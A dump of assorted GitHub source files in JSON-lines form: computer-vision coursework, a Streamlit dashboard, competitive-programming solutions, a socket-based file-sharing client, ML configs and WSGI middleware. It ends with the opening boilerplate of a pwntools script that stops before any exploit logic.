kì\r\ncv2.waitKey (0)\r\n\r\n#giải phóng bộ nhớ dùng để hiển thị hình\r\ncv2.destroyAllWindows() \r\n","repo_name":"sweetiepickle/machine-vision-python","sub_path":"MP12-sharpening.py","file_name":"MP12-sharpening.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27925591437","text":"import pandas as pd\nimport streamlit as st\n\nscreen_df = pd.read_csv('/Users/wendyarias/Documents/GitHub/dashboard-streamlit/ScreenTime.csv')\nphone_df = pd.read_csv('/Users/wendyarias/Documents/GitHub/dashboard-streamlit/telephony2.csv')\n### this is a header\nst.header(\"Group Project Data\")\nst.caption(\"visual representation of data\")\n\n### to display \nif st.checkbox('Show Screen Time'):\n st.table(screen_df)\n\nif st.checkbox('Show Telephone Data'):\n st.table(phone_df)\n\n## barchart\nst.subheader(\"Screen Time Data\")\nscreen_bat_tot = screen_df['battery_level'].value_counts()\nst.bar_chart(screen_bat_tot)\nst.caption(\"A representation of phones battery level \") \n\n## line chart\nst.subheader('Visual of Call type')\ncall_type = phone_df['type']\nst.line_chart(call_type)\nst.caption(\" a representation of the types of calls made daily\")\n\n\n### code block\ncode = '''\nst.subheader(\"Screen Time Data\")\nscreen_bat_tot = screen_df['battery_level'].value_counts()\nst.bar_chart(screen_bat_tot)\nst.caption(\"A representation of phones battery level \") \n'''\nst.code(code, language='python')\nst.caption(\"code used to make barchart\")\n#pip3 install pipenv\n#pip3 install env\n#sudo -H pip install -U pipenv in shh do pip install pipenv\n#pipenv shell\n#pip3 install streamlit\n","repo_name":"win-n-nie/dashboard-streamlit","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29781769378","text":"## CSC320 Winter 2019 \n## Assignment 2\n## (c) Kyros Kutulakos\n##\n## DISTRIBUTION OF THIS CODE ANY FORM (ELECTRONIC OR OTHERWISE,\n## AS-IS, MODIFIED OR IN PART), WITHOUT PRIOR WRITTEN AUTHORIZATION \n## BY THE INSTRUCTOR IS STRICTLY PROHIBITED. VIOLATION OF THIS \n## POLICY WILL BE CONSIDERED AN ACT OF ACADEMIC DISHONESTY\n\n##\n## DO NOT MODIFY THIS FILE ANYWHERE EXCEPT WHERE INDICATED\n##\n\nimport numpy as np\nimport cv2 as cv\n\n# File psi.py define the psi class. You will need to \n# take a close look at the methods provided in this class\n# as they will be needed for your implementation\nimport psi \n\n# File copyutils.py contains a set of utility functions\n# for copying into an array the image pixels contained in\n# a patch. These utilities may make your code a lot simpler\n# to write, without having to loop over individual image pixels, etc.\nimport copyutils\n\n#########################################\n## PLACE YOUR CODE BETWEEN THESE LINES ##\n#########################################\n\n# If you need to import any additional packages\n# place them here. Note that the reference \n# implementation does not use any such packages\n\n#########################################\n\n\n#########################################\n#\n# Computing the Patch Confidence C(p)\n#\n# Input arguments: \n# psiHatP: \n# A member of the PSI class that defines the\n# patch. See file inpainting/psi.py for details\n# on the various methods this class contains.\n# In particular, the class provides a method for\n# accessing the coordinates of the patch center, etc\n# filledImage:\n# An OpenCV image of type uint8 that contains a value of 255\n# for every pixel in image I whose color is known (ie. either\n# a pixel that was not masked initially or a pixel that has\n# already been inpainted), and 0 for all other pixels\n# confidenceImage:\n# An OpenCV image of type uint8 that contains a confidence \n# value for every pixel in image I whose color is already known.\n# Instead of storing confidences as floats in the range [0,1], \n# you should assume confidences are represented as variables of type \n# uint8, taking values between 0 and 255.\n#\n# Return value:\n# A scalar containing the confidence computed for the patch center\n#\n\ndef computeC(psiHatP=None, filledImage=None, confidenceImage=None):\n assert confidenceImage is not None\n assert filledImage is not None\n assert psiHatP is not None\n\n #########################################\n ## PLACE YOUR CODE BETWEEN THESE LINES ##\n #########################################\n # zero out the unknown pixel\n valid_image = np.divide(np.multiply(filledImage, confidenceImage), 255)\n\n # numerator: sum of the C(q) of all filled pixels in the patch\n # dealing with the case: the patch somehow out of the boundary of the image\n window, valid = copyutils.getWindow(valid_image, psiHatP._coords, psiHatP._w)\n numerator = np.sum(window * valid)\n\n # denominator: the size of the patch\n # valid patch size, i.e.: not out of the boundary of the image\n denominator = np.sum(valid)\n\n # confidences are of type uint8, taking values between 0 and 255.\n C = np.clip((numerator / denominator).astype(np.uint8), 0, 255)\n #########################################\n\n return C\n\n#########################################\n#\n# Computing the max Gradient of a patch on the fill front\n#\n# Input arguments: \n# psiHatP:\n# A member of the PSI class that defines the\n# patch. See file inpainting/psi.py for details\n# on the various methods this class contains.\n# In particular, the class provides a method for\n# accessing the coordinates of the patch center, etc\n# filledImage:\n# An OpenCV image of type uint8 that contains a value of 255\n# for every pixel in image I whose color is known (ie. either\n# a pixel that was not masked initially or a pixel that has\n# already been inpainted), and 0 for all other pixels\n# inpaintedImage:\n# A color OpenCV image of type uint8 that contains the \n# image I, ie. the image being inpainted\n#\n# Return values:\n# Dy: The component of the gradient that lies along the \n# y axis (ie. the vertical axis).\n# Dx: The component of the gradient that lies along the \n# x axis (ie. the horizontal axis).\n#\n\ndef computeGradient(psiHatP=None, inpaintedImage=None, filledImage=None):\n assert inpaintedImage is not None\n assert filledImage is not None\n assert psiHatP is not None\n\n #########################################\n ## PLACE YOUR CODE BETWEEN THESE LINES ##\n #########################################\n # OpenCV function converts color image to grayscale image\n gray = cv.cvtColor(inpaintedImage, cv.COLOR_BGR2GRAY)\n\n # OpenCV function computes horizontal and vertical component of the gradient\n # 3x3 Scharr filter is used which gives better results than 3x3 Sobel filter\n Dx = cv.Scharr(gray, cv.CV_64F, 1, 0)\n Dy = cv.Scharr(gray, cv.CV_64F, 0, 1)\n\n # zero out the unknown pixel\n Dx_valid = np.divide(np.multiply(Dx, filledImage), 255.)\n Dy_valid = np.divide(np.multiply(Dy, filledImage), 255.)\n\n # Dealing the case, the patch somehow out of the boundary of the image\n windowDx, validDx = copyutils.getWindow(Dx_valid, psiHatP._coords, psiHatP._w)\n windowDy, validDy = copyutils.getWindow(Dy_valid, psiHatP._coords, psiHatP._w)\n\n # focus on the pixels inside the patch\n Dx_patch = np.array(windowDx * validDx)\n Dy_patch = np.array(windowDy * validDy)\n\n # combine Dx and Dy to the total gradient\n D_patch = np.power(Dx_patch, 2) + np.power(Dy_patch, 2)\n\n Dx = Dx_patch.item(np.argmax(D_patch))\n Dy = Dy_patch.item(np.argmax(D_patch))\n #########################################\n\n return Dy, Dx\n\n#########################################\n#\n# Computing the normal to the fill front at the patch center\n#\n# Input arguments: \n# psiHatP: \n# A member of the PSI class that defines the\n# patch. See file inpainting/psi.py for details\n# on the various methods this class contains.\n# In particular, the class provides a method for\n# accessing the coordinates of the patch center, etc\n# filledImage:\n# An OpenCV image of type uint8 that contains a value of 255\n# for every pixel in image I whose color is known (ie. either\n# a pixel that was not masked initially or a pixel that has\n# already been inpainted), and 0 for all other pixels\n# fillFront:\n# An OpenCV image of type uint8 that whose intensity is 255\n# for all pixels that are currently on the fill front and 0 \n# at all other pixels\n#\n# Return values:\n# Ny: The component of the normal that lies along the \n# y axis (ie. the vertical axis).\n# Nx: The component of the normal that lies along the \n# x axis (ie. the horizontal axis).\n#\n# Note: if the fill front consists of exactly one pixel (ie. the\n# pixel at the patch center), the fill front is degenerate\n# and has no well-defined normal. In that case, you should\n# set Nx=None and Ny=None\n#\n\ndef computeNormal(psiHatP=None, filledImage=None, fillFront=None):\n assert filledImage is not None\n assert fillFront is not None\n assert psiHatP is not None\n\n #########################################\n ## PLACE YOUR CODE BETWEEN THESE LINES ##\n #########################################\n window, valid = copyutils.getWindow(fillFront, psiHatP._coords, psiHatP._w)\n valid_window = np.array(window * valid)\n\n if np.count_nonzero(valid_window) == 1:\n Nx = None\n Ny = None\n else:\n # get the gradient kernel w.r.t a and y direction\n sobel3x = np.array(cv.getDerivKernels(1, 0, 3))\n sobel3y = np.array(cv.getDerivKernels(0, 1, 3))\n\n # use convolution to get the gradient on x and y direction\n xGradient = np.array(cv.filter2D(valid_window, cv.CV_64F, sobel3x))\n yGradient = np.array(cv.filter2D(valid_window, cv.CV_64F, sobel3y))\n\n # only focus on the center pixel\n center_index = (window.size - 1) / 2\n dx = xGradient.item(center_index)\n dy = yGradient.item(center_index)\n norm = (dx ** 2 + dy ** 2) ** (1 / 2)\n\n Nx = dx / norm\n Ny = dy / norm\n #########################################\n\n return Ny, Nx","repo_name":"syhAnna/Introduction-to-computer-vision","sub_path":"intro_to_cv/A2/code/inpainting/compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":8519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13408597492","text":"n, k1, k2, s = (int(x) for x in input().split())\ncount = [[0 for _ in range(n+1)] for _ in range(n+1)]\ncount[k1][k2] = 2**100\nfor i1 in range(k1, n):\n for i2 in range(k2, n):\n count[i1+1][i2] += count[i1][i2] // 2\n count[i1][i2+1] += count[i1][i2] // 2\n\ns1 = 0; s2 = 0;\nfor i in range(n+1): s1 += count[i][n];\nfor i in range(n+1): s2 += count[n][i];\nassert(s1+s2 == 2**100)\ns1 = s * s1 // 2**100\ns2 = s * s2 // 2**100\nprint(s2, s1, end = ' ')\n","repo_name":"dmkz/competitive-programming","sub_path":"acmp.ru/0506.py","file_name":"0506.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"77"} +{"seq_id":"22873489039","text":"import cv2\nimport numpy as np\nfrom torchvision.transforms import ColorJitter\nfrom PIL import Image\n\n\nclass Compose(object):\n def __init__(self, transforms):\n self.transforms = transforms\n\n def __call__(self, img, kpts=None):\n for t in self.transforms:\n img, kpts = t(img, kpts)\n if kpts is None:\n return img\n else:\n return img, kpts\n\n def __repr__(self):\n format_string = self.__class__.__name__ + \"(\"\n for t in self.transforms:\n format_string += \"\\n\"\n format_string += \" {0}\".format(t)\n format_string += \"\\n)\"\n return format_string\n\n\nclass ToTensor(object):\n def __call__(self, img, kpts):\n return img / 255., kpts\n\n\nclass Normalize(object):\n def __init__(self, mean, std):\n self.mean = mean\n self.std = std\n\n def __call__(self, img, kpts):\n img -= self.mean\n img /= self.std\n return img, kpts\n\n\nclass JpegCompress(object):\n def __init__(self, quality_low=15, quality_high=75):\n self.quality_low = quality_low\n self.quality_high = quality_high\n\n def __call__(self, img, kpts):\n if np.random.uniform(0, 1) < 0.5:\n return img, kpts\n\n quality = np.random.randint(self.quality_low, self.quality_high)\n encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), quality]\n result, encimg = cv2.imencode('.jpg', img, encode_param)\n img = cv2.imdecode(encimg, 1)\n return img, kpts\n\n\nclass GaussianBlur(object):\n def __init__(self, blur_range=(3, 5, 7, 9, 11)):\n self.blur_range = blur_range\n\n def __call__(self, img, kpts):\n if np.random.uniform(0, 1) < 0.5:\n return img, kpts\n\n sigma = np.random.choice(self.blur_range, 1, p=(0.4, 0.3, 0.2, 0.05, 0.05))\n return cv2.GaussianBlur(img, (sigma, sigma), 0), kpts\n\n\nclass AddNoise(object):\n def __call__(self, img, kpts):\n if np.random.uniform(0, 1) < 0.66:\n return img, kpts\n\n # gaussian noise\n if np.random.uniform(0, 1) < 0.75:\n row, col, ch = img.shape\n mean = 0\n var = np.random.rand(1) * 0.3 * 256\n sigma = var**0.5\n gauss = sigma * np.random.randn(row,col) + mean\n gauss = np.repeat(gauss[:, :, np.newaxis], ch, axis=2)\n img = img + gauss\n img = np.clip(img, 0, 255)\n img = img.astype(np.uint8)\n else:\n # motion blur\n sizes = [3, 5, 7, 9]\n size = sizes[int(np.random.randint(len(sizes), size=1))]\n kernel_motion_blur = np.zeros((size, size))\n if np.random.rand(1) < 0.5:\n kernel_motion_blur[int((size-1)/2), :] = np.ones(size)\n else:\n kernel_motion_blur[:, int((size-1)/2)] = np.ones(size)\n kernel_motion_blur = kernel_motion_blur / size\n img = cv2.filter2D(img, -1, kernel_motion_blur)\n\n return img, kpts\n\n\nclass Jitter(object):\n def __init__(self, brightness=0.5, contrast=0.2, saturation=0.2, hue=0.2):\n self.jitter = ColorJitter(brightness, contrast, saturation, hue)\n\n def __call__(self, img, kpts):\n if np.random.uniform(0, 1) < 0.66:\n return img, kpts\n\n img = np.asarray(self.jitter(Image.fromarray(img)))\n return img, kpts\n","repo_name":"zhixuan-lin/descriptor-space","sub_path":"lib/data/transforms/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23783806552","text":"import sys\n\n\ndef solution(cur):\n global eggs\n global answer\n\n count = 0\n for egg in eggs:\n if egg[0] <= 0:\n count += 1\n answer = max(answer, count)\n\n if cur == len(eggs):\n return\n\n if eggs[cur][0] <= 0:\n solution(cur+1)\n return\n\n for i in range(len(eggs)):\n if i == cur or eggs[i][0] <= 0:\n continue\n eggs[cur][0] -= eggs[i][1]\n eggs[i][0] -= eggs[cur][1]\n solution(cur+1)\n eggs[cur][0] += eggs[i][1]\n eggs[i][0] += eggs[cur][1]\n\n\nif __name__ == \"__main__\":\n N = int(sys.stdin.readline().rstrip())\n answer = 0\n eggs = [list(map(int, sys.stdin.readline().split())) for _ in range(N)]\n solution(0)\n print(answer)\n","repo_name":"pangpang-study/algorithm-coding-test-study","sub_path":"nyc/211116/baekjoon_16987_계계치.py","file_name":"baekjoon_16987_계계치.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"28747954079","text":"import datastorage\nimport time\nimport numpy as np\nimport progressbar\n\ndef take_data(Npulse=10):\n import lecroy\n scope=lecroy.LeCroyScope(\"10.0.0.1\")\n Nsamples = scope.get_waveform(2)[1].shape[0]\n ch2 = np.zeros( (Npulse,Nsamples) )\n t0 = time.time()\n p = progressbar.ProgressBar(Npulse)\n p.start()\n for i in range(Npulse):\n scope.trigger()\n ch2[i] = scope.get_waveform(2)[1]\n# ch4[i] = scope.get_waveform(4)[1]\n p.update(i)\n #print((i+1)/(time.time()-t0))\n p.finish()\n return datastorage.DataStorage( t = scope.get_xaxis(), ch2 = ch2)\n\ndef ana(fname):\n data=datastorage.DataStorage(fname)\n ch3 = data.ch3[:,12000:24000]\n ch3_base = ch3[:,:2000].mean(1)\n ch3 = ch3 - ch3_base[:,np.newaxis]\n ch4 = data.ch4[:,12000:24000]\n ch4_base = ch4[:,:2000].mean(1)\n ch4 = ch4 - ch4_base[:,np.newaxis]\n ch3_sum = ch3.sum(axis=1)\n ch4_sum = ch4.sum(axis=1)\n return ch3_sum,ch4_sum\n \n","repo_name":"marcocamma/openlab","sub_path":"openlab/oscilloscopes/lecroy/lecroy_collect.py","file_name":"lecroy_collect.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73785537527","text":"#Name:Amartejas Manjunath\r\n#ID no: 1001742606\r\n\r\nimport socket # To create socket\r\nimport sys # system commands\r\nimport os # create directory\r\nimport PySimpleGUI as sg # for GUI\r\nimport threading # for threading\r\nimport queue # for monitor\r\nimport time\r\nimport itertools\r\nimport numpy as np # to generate random number\r\nfrom watchdog.observers import Observer # For watchdog to watch\r\nfrom watchdog.events import FileSystemEventHandler # for watchdog\r\nimport glob\r\n\r\nfname = \"\"\r\nval = \"\"\r\npaths = []\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((socket.gethostname(), 8585))\r\nprob = \"11\"\r\n#count = 0\r\n\r\n# A class to take action when a file in added to the shared directory\r\n\r\nclass Myhandler(FileSystemEventHandler):\r\n @staticmethod\r\n def on_any_event(event):\r\n if event.is_directory:\r\n return None\r\n elif event.event_type == 'created': # A event when file in uploaded to the shared directory\r\n # Take any action here when a file is first created.\r\n print(\"Received modified event - %s\" % event.src_path)\r\n #paths.append(event.src_path)\r\n sg.PopupTimed('File updated in Directory', auto_close_duration=8, non_blocking=True)\r\n sendfile(event.src_path) # send the file path detected to sendfile function to send the file to server\r\n elif event.event_type == 'deleted':\r\n print(\"Deleted\")\r\n pd = event.src_path\r\n print(pd)\r\n td = threading.Thread(target=delete, daemon=True, args=(pd, ))\r\n td.start()\r\n\r\ndef delete2():\r\n print(\"voting to delete or not\")\r\n time.sleep(3)\r\n prob = np.random.randint(2, size=1)\r\n prob = prob[0]\r\n print(prob)\r\n prob = str(prob)\r\n prob = bytes(prob, encoding=\"utf-8\")\r\n s.send(prob)\r\n print(\"vote sent\")\r\ndef delete(fname1):\r\n messa = val + 'is coordinator'\r\n sg.PopupTimed(messa, auto_close_duration=3, non_blocking=True)\r\n fname1 = fname1.split(val)[1]\r\n fname1 = fname1.replace(\"\\\\\", \"\")\r\n text = \"vote&\" + fname1\r\n print(text)\r\n text = bytes(text, encoding=\"utf-8\")\r\n s.send(text)\r\n\r\n# This Function is used to send the username to the server to check for duplicates and create a directory with the user.\r\n\r\ndef conn(usr):\r\n username = str(usr) # Save the username\r\n print(username)\r\n username = bytes(username, encoding='utf8') # convert the username to bytes to send\r\n s.send(username) # send the username to server to check\r\n reply = s.recv(1024) # Receive the reply from server about the username\r\n reply1 = reply.decode(\"utf8\") # convert the sent data to string\r\n print(\"reply1\", reply1)\r\n if reply1 == \"connected\": # check if connected\r\n print(\"Connected\")\r\n sg.PopupTimed('Connected', auto_close_duration=8, non_blocking=True) # using GUI to pop a window to show connected\r\n if not os.path.exists(username):\r\n os.mkdir(username, 777) # if a file of same name does not exist create a directory\r\n tt = threading.Thread(target=monitor, args=(username,), daemon=True) # Start a thread to monitor the shared directory\r\n tt.start()\r\n #tt.join()\r\n #monitor(username)\r\n else:\r\n sg.PopupTimed('Change Username', auto_close_duration=8, non_blocking=True)\r\n# This function is to stop the client from sending files in a loop so client will not send files that a it recieved from the server\r\n\r\n# also send file to server which was put in shared directory\r\n\r\ndef sendfile(filename):\r\n if \"received\" in filename:\r\n return\r\n print(\"filename:\", filename)\r\n file = open(filename, 'r') # open file in read mode from the shared directory\r\n data = file.read(1024) # read the file\r\n data = str.encode(data) # encode the file to send\r\n print(\"data\", data)\r\n filename = bytes(filename, encoding=\"utf-8\")\r\n s.send(filename)\r\n s.send(data)# Send data to the server\r\n print(\"sent\")\r\n\r\n\r\n# This function is part of the watchDog library which monitors a folder\r\n# https://www.michaelcho.me/article/using-pythons-watchdog-to-monitor-changes-to-a-directory\r\n# Also sending the file in shared directory, to the server\r\n\r\ndef monitor(usr1):\r\n usr1 = usr1.decode(\"utf8\")\r\n event_handler = Myhandler() # Assigning handler class\r\n observer = Observer() # assign observer class\r\n pathFile = r\"C:\\Users\\Amar\\Project\" + \"\\\\\" + usr1 # assigning the shared directory to be watched\r\n #paths.append(usr1)\r\n observer.schedule(event_handler, path=pathFile, recursive=False) # schedule class to set up watcher\r\n observer.start() # start the watcher\r\n print(\"Receving\")\r\n try:\r\n while True:\r\n time.sleep(1) # keep checking every second\r\n filename12 = s.recv(1024) # waiting for invalidation\r\n filename12 = filename12.decode(\"utf-8\")\r\n print(\"down\", filename12)\r\n if \"deleting file\" in filename12:\r\n global fname\r\n fname = filename12.split(\"&\")[1]\r\n td2 = threading.Thread(target=delete2, daemon=True)\r\n td2.start()\r\n elif filename12 == \"abort\":\r\n path2 = val + \"\\**\"\r\n configfiles = glob.glob(path2, recursive=True)\r\n print(configfiles)\r\n for x in configfiles:\r\n if fname in x:\r\n f = open(x, 'r')\r\n data = f.read(1024)\r\n f.close()\r\n data = bytes(data, encoding=\"utf-8\")\r\n s.send(data)\r\n elif filename12 == \"commit\":\r\n path1 = val + \"\\**\"\r\n print(path1)\r\n configfiles = glob.glob(path1, recursive=True)\r\n print(configfiles)\r\n for x in configfiles:\r\n if fname in x:\r\n os.remove(x)\r\n else:\r\n data = s.recv(1024) # receiving file from server\r\n data = data.decode(\"utf-8\")\r\n filename2 = pathFile\r\n filename21 = \"{}\\\\received_{}\".format(filename2, filename12) # add a received tag to filename\r\n print(filename21)\r\n file = open(filename21, 'w') # open file to write\r\n file.write(data) # write the data on file\r\n file.close() # close the file\r\n except KeyboardInterrupt:\r\n observer.stop() # close watcher\r\n observer.join()\r\n\r\n\r\nif __name__ == '__main__': # This is where the Program for client begins everytime\r\n layout = [\r\n [sg.Text('Please enter Username')],\r\n [sg.Text('Client Username', size=(15, 1)), sg.InputText()],\r\n [sg.Button(\"Connect 1\"), sg.Button(\"Kill\")],\r\n ] # The GUI for client to accept the the username, it has connect and kill buttons\r\n\r\n window = sg.Window('File sharing Client-Server', layout)\r\n\r\n # The window function used from PySimpleGUI to create the above layout and give the window name\r\n\r\n # Starting a loop to take the input values and create a event f or the button click.\r\n\r\n while True:\r\n event, values = window.Read() # Read the values and events from the GUI\r\n print(event, values)\r\n val = str(values[0]) # Store username from imput to the variable val\r\n if event == \"Connect 1\": # Once the Button is clicked\r\n t1 = threading.Thread(target=conn, args=(val,), daemon=True) # Creating a Thread to\r\n t1.start() # Start the Thread\r\n #t1.join()\r\n elif event == \"Kill\": # If kill Button is clicked close the connection and the window\r\n s.close()\r\n break\r\n window.Close()\r\n\r\n","repo_name":"Amartejas05/Grad_Projects","sub_path":"Distributed System/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":8575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5090044249","text":"from typing import Optional, Dict\n\nimport cbor2\n\nfrom ..types import ResourceID, IDNSRecord, Resource, DNSRecordType, ResourceType\nfrom ..utils.misc import assert_type\n\n\nclass DNSRecord(IDNSRecord):\n\n @staticmethod\n def make(name: str, type: DNSRecordType, value: str, ttl: int, *,\n description: Optional[str] = None) -> 'DNSRecord':\n # verify types\n assert_type(name, str)\n assert_type(type, DNSRecordType)\n assert_type(value, str)\n assert_type(ttl, int)\n assert_type(description, str, nullable=True)\n # ---\n dns_record = DNSRecord(\n id=ResourceID.make(ResourceType.DNS_RECORD),\n name=name,\n description=description,\n _type=type,\n _value=value,\n _ttl=ttl\n )\n dns_record.commit()\n return dns_record\n\n @classmethod\n def deserialize(cls, value: bytes, metadata: Optional[Dict] = None) -> 'DNSRecord':\n data = cbor2.loads(value)\n return DNSRecord(\n **Resource.parse(data, metadata),\n _type=DNSRecordType(data['_type']),\n _value=data['_value'],\n _ttl=int(data['_ttl']),\n )\n","repo_name":"afdaniele/cattleman","sub_path":"include/cattleman/resources/dns_record.py","file_name":"dns_record.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22968860299","text":"r\"\"\"A config to load and evaluate models.\n\nThe runtime varies widely depending on the model, but each one should reproduce\nthe corresponding paper's numbers.\nThis configuration makes use of the \"arg\" to get_config to select which model\nto run, so a few examples are given below:\n\nRun and evaluate a BiT-M ResNet-50x1 model that was transferred to i1k:\n\nbig_vision.tools.eval_only \\\n --config big_vision/configs/load_and_eval.py:name=bit_paper,batch_size=8 \\\n --config.model_init M-imagenet2012 --config.model.width 1 --config.model.depth 50\n\nRun and evaluate the recommended ViT-B/32 from \"how to train your vit\" paper:\n\nbig_vision.tools.eval_only \\\n --config big_vision/configs/load_and_eval.py:name=vit_i21k,batch_size=8 \\\n --config.model.variant B/32 --config.model_init howto-i21k-B/32\n\"\"\"\n\nimport big_vision.configs.common as bvcc\nfrom big_vision.configs.common_fewshot import get_fewshot_lsr\n# from big_vision.configs.proj.image_text import lit_eval\n\n\ndef eval_only(config, batch_size, spec_for_init):\n \"\"\"Set a few configs that turn trainer into (almost) eval-only.\"\"\"\n config.total_steps = 0\n config.input = {}\n config.input.batch_size = batch_size\n config.input.data = dict(name='bv:dummy', spec=spec_for_init)\n config.optax_name = 'identity'\n config.lr = 0.0\n return config\n\n\ndef get_config(arg='name=bit_paper,batch_size=2'):\n config = bvcc.parse_arg(arg, name='', batch_size=2)\n\n # Make the config eval-only by setting some dummies.\n eval_only(config, config.batch_size, spec_for_init=dict(\n image=dict(shape=(224, 224, 3), dtype='float32'),\n ))\n\n # Just calls the function with the name given as `config`.\n # Could also be a giant if-block if you're into that kind of thing.\n globals()[config.name](config)\n return config\n\n\ndef bit_paper(config):\n config.num_classes = 1000\n\n config.model_name = 'bit_paper'\n config.model_init = 'M-imagenet2012' # M = i21k, -imagenet2012 = fine-tuned\n config.model = dict(width=1, depth=50)\n\n config.evals = {}\n config.evals.fewshot = get_fewshot_lsr()\n\n def get_eval(split, lbl, dataset='imagenet2012_real'):\n return dict(\n type='classification',\n data=dict(name=dataset, split=split),\n loss_name='softmax_xent',\n cache_final=False, # Only run once, on low-mem machine.\n pp_fn=(\n 'decode|resize(384)|value_range(-1, 1)'\n f'|onehot(1000, key=\"{lbl}\", key_result=\"labels\")'\n '|keep(\"image\", \"labels\")'\n ),\n )\n config.evals.test = get_eval('validation', 'original_label')\n config.evals.real = get_eval('validation', 'real_label')\n config.evals.v2 = get_eval('test', 'label', 'imagenet_v2')\n\n\ndef vit_i1k(config):\n config.num_classes = 1000\n\n config.model_name = 'vit'\n config.model_init = '' # Will be set in sweep.\n config.model = dict(variant='S/16', pool_type='gap', posemb='sincos2d',\n rep_size=True)\n\n config.evals = {}\n config.evals.fewshot = get_fewshot_lsr()\n config.evals.val = dict(\n type='classification',\n data=dict(name='imagenet2012', split='validation'),\n pp_fn='decode|resize_small(256)|central_crop(224)|value_range(-1, 1)|onehot(1000, key=\"label\", key_result=\"labels\")|keep(\"image\", \"labels\")',\n loss_name='softmax_xent',\n cache_final=False, # Only run once, on low-mem machine.\n )\n\n\ndef mlp_mixer_i1k(config):\n config.num_classes = 1000\n\n config.model_name = 'mlp_mixer'\n config.model_init = '' # Will be set in sweep.\n config.model = dict(variant='L/16')\n\n config.evals = {}\n config.evals.fewshot = get_fewshot_lsr()\n config.evals.val = dict(\n type='classification',\n data=dict(name='imagenet2012', split='validation'),\n pp_fn='decode|resize_small(256)|central_crop(224)|value_range(-1, 1)|onehot(1000, key=\"label\", key_result=\"labels\")|keep(\"image\", \"labels\")',\n loss_name='softmax_xent',\n cache_final=False, # Only run once, on low-mem machine.\n )\n\n\ndef vit_i21k(config):\n config.num_classes = 21843\n\n config.model_name = 'vit'\n config.model_init = '' # Will be set in sweep.\n config.model = dict(variant='B/32', pool_type='tok')\n\n config.evals = {}\n config.evals.fewshot = get_fewshot_lsr()\n config.evals.val = dict(\n type='classification',\n data=dict(name='imagenet21k', split='full[:51200]'),\n pp_fn='decode|resize_small(256)|central_crop(224)|value_range(-1, 1)|onehot(21843)|keep(\"image\", \"labels\")',\n loss_name='sigmoid_xent',\n cache_final=False, # Only run once, on low-mem machine.\n )\n","repo_name":"google-research/big_vision","sub_path":"big_vision/configs/load_and_eval.py","file_name":"load_and_eval.py","file_ext":"py","file_size_in_byte":4512,"program_lang":"python","lang":"en","doc_type":"code","stars":1152,"dataset":"github-code","pt":"77"} +{"seq_id":"4797385745","text":"import cProfile as profile\nfrom cStringIO import StringIO\nimport os\n\nclass CircumventJunoInputParsing(object):\n \"\"\"WSGI middleware that copies the 'wsgi.input' file-like object to\n 'request_body_bytes' so that it can be read directly, instead of having Juno\n exhaust the file by parsing it into fields.\n \"\"\"\n def __init__(self, application):\n self.application = application\n\n def __call__(self, environ, start_response):\n environ['request_body_bytes'] = environ['wsgi.input']\n environ['wsgi.input'] = StringIO()\n\n return self.application(environ, start_response)\n\nclass ProfileRequests(object):\n \"\"\"WSGI middleware that profiles requests with cProfile for CPU usage. Due to\n the overhead, it only runs every 100 requests, and is disabled by default.\n \"\"\"\n def __init__(self, application):\n self.application = application\n self.request_counter = 0\n if not os.path.exists('/mnt/log/profiler'):\n os.mkdir('/mnt/log/profiler')\n self.run_every = 100\n\n def __call__(self, environ, start_response):\n self.request_counter += 1\n if self.request_counter % self.run_every == 0:\n _locals = locals()\n profiler = profile.Profile()\n profiler.runctx(\n 'returned_value = self.application(environ,start_response)',\n globals(), _locals)\n output_path = os.path.join('/mnt/log/profiler',\n 'prof_' + str(self.request_counter / self.run_every))\n if os.path.exists(output_path):\n os.remove(output_path)\n profiler.dump_stats(output_path)\n return _locals['returned_value']\n return self.application(environ, start_response)\n","repo_name":"pragnesh/taba","sub_path":"py/tellapart/taba/util/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"31832894445","text":"#!/usr/bin/env python3\nfrom pwn import *\n\ncontext.log_level = 'debug'\ncontext.terminal = ['tmux', 'split', '-h']\n\nelf = ELF('./chal3')\n\ncontext.binary = elf\n\nENCODING = 'ISO-8859-1'\ns = lambda senddata : p.send(senddata.encode(ENCODING))\nsa = lambda recvdata, senddata : p.sendafter(recvdata.encode(ENCODING), senddata.encode(ENCODING))\nsl = lambda senddata : p.sendline(senddata.encode(ENCODING))\nsla = lambda recvdata, senddata : p.sendlineafter(recvdata.encode(ENCODING), senddata.encode(ENCODING))\nr = lambda numb=0x3f3f3f3f, timeout=0x3f3f3f3f : p.recv(numb, timeout=timeout).decode(ENCODING)\nru = lambda recvdata, timeout=0x3f3f3f3f : p.recvuntil(recvdata.encode(ENCODING), timeout=timeout).decode(ENCODING)\nuu32 = lambda data : u32(data.encode(ENCODING), signed='unsigned')\nuu64 = lambda data : u64(data.encode(ENCODING), signed='unsigned')\niu32 = lambda data : u32(data.encode(ENCODING), signed='signed')\niu64 = lambda data : u64(data.encode(ENCODING), signed='signed')\nup32 = lambda data : p32(data, signed='unsigned').decode(ENCODING)\nup64 = lambda data 